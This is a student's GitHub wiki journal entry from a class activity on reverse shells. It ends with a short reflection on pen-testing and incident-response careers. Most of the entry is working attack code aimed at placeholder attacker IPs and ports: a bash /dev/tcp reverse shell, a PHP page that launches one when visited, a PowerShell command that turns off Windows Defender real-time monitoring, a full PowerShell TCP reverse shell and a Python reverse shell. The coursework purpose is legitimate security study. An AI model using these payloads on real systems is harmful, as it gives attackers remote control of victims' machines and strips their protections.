Class Activity 8.2 Reverse Shells - Foren-Ken/tech-journal GitHub Wiki

What is a reverse shell?

Reverse shells work in the opposite direction to normal remote shells. This is done by having the client request information from the host to then run on the client's side. After a little research, this method seems to be used to bypass some safeguards like firewalls which are configured to not expect the client to also be the victim.

Techniques:

Linux: Reverse shells on this platform are very simple and built-in. The command is as follows
bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1 credit swisskyrepo.github.io

This method can be extended to websites, allowing the visit of a website trigger the reverse shell.
<?php $ip = '[Attacker IP]'; $port = [Attacker Port]; $cmd = '/bin/bash -i >& /dev/tcp/' . $ip . '/' . $port . ' 0>&1'; exec($cmd); ?>

Windows: Windows Defender will prevent this from working. The following command can deal with Windows Defender assuming tamper protection is off:
Set-MpPreference -DisableRealtimeMonitoring $true

To then run a reverse shell, the following PowerShell script can be used:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python: Using Python, or other scripting languagues, can easily be found with a simple websearch. swisskyrepo.github.io is a great catelog of different reverse shells which can be used on different languages. For Python, I had tested and verified the following reverse shell (for Python 2.7.5):
python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("Attacker_IP",Attacker_Port));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

Reflection

The major reflection I have for this lab is how little I understand sockets and processes over networks. This is a major item I want to learn and develop skills on due to how this skill can be applied on many different situations. If I plan to pursue Pen-Testing, this skill would make private scripts more cohesive as I will understand how what I'm doing works. Other professions I'm interested, like DFIR, could use the knowledge of sockets and reverse shells to understand how an incident happened and investigate who had done it.